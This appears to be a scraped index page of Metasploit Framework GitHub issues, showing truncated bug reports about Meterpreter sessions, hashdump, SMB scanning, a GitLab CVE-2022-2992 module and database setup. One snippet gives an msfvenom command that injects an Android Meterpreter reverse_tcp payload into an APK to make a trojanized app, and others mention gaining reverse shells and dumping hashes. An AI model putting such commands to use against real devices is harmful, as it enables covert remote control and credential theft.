metasploit-framework icon indicating copy to clipboard operation
metasploit-framework copied to clipboard

Metasploit Framework

Results 550 metasploit-framework issues
Sort by recently updated
recently updated
newest added

``` # cowsay++ ____________ < metasploit > ------------ \ ,__, \ (oo)____ (__) )\ ||--|| * ``` ## Verification - [ ] Start `msfconsole` - [ ] Get a session...

module
easy
needs-docs
osx

## Steps to reproduce How'd you do it? 1. get a meterpreter shell on Windows 7 (6.1 Build 7601, Service Pack 1). 2. run `getenv TEMP`. ## Expected behavior The...

meterpreter
bug
confirmed

## Steps to reproduce 0. Get a Meterpreter shell (I used `windows/x64/meterpreter/reverse_tcp` but it should not matter) 1. Start Python HTTP server on MSF host: `python3 -m http.server 8080` 2....

bug
confirmed
not-stale

To reproduce the issue use the following command to inject payload in an apk `sudo msfvenom -x app.apk -p android/meterpreter/reverse_tcp lhost=ip lport=port--platform android -o app-trojan.apk` The **app.apk** it self is...

bug
android

## Steps to reproduce Open a root meterpreter session with an ELF `linux/x64/meterpreter/reverse_tcp` on a Debian 10.1 x64 target ([Five86-1 from VulnHub](https://www.vulnhub.com/entry/five86-1,417/)). Attempt to use `post/linux/gather/hashdump` which failed ``` msf5...

database
usability
not-stale

To do list for myself 1. Skip cracking attempts for hashes we don't have any. This happens because we build a list of ALL hashes the user wants to crack,...

bug

## Summary When we run `smb_version` with Metasploit against a windows server 2016 domain controller, the output is: ``` [*] 192.168.123.13:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression...

suggestion-feature

## Steps to reproduce I tried to use auxiliary/gather/shodan_honeyscore to check if an IP is a honeypot while it returns errors like below: ``` root@kali:~# msfconsole msf5 > use auxiliary/gather/shodan_honeyscore...

bug

This module exploit the CVE-2022-2992, which allow an authenticate user to achieve remote code execution through the feature Github Import in a server running a affected version of the Gitlab....

module
library
docs

``` PS D:\metasploit-framework\bin> .\msfdb.bat reinit --component database --use-defaults D:/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/rex-core-0.1.28/lib/rex/compat.rb:378: warning: Win32API is deprecated after Ruby 1.9.1; use fiddle directly instead Overriding user environment variable 'OPENSSL_CONF' to enable legacy functions. Clearing...

bug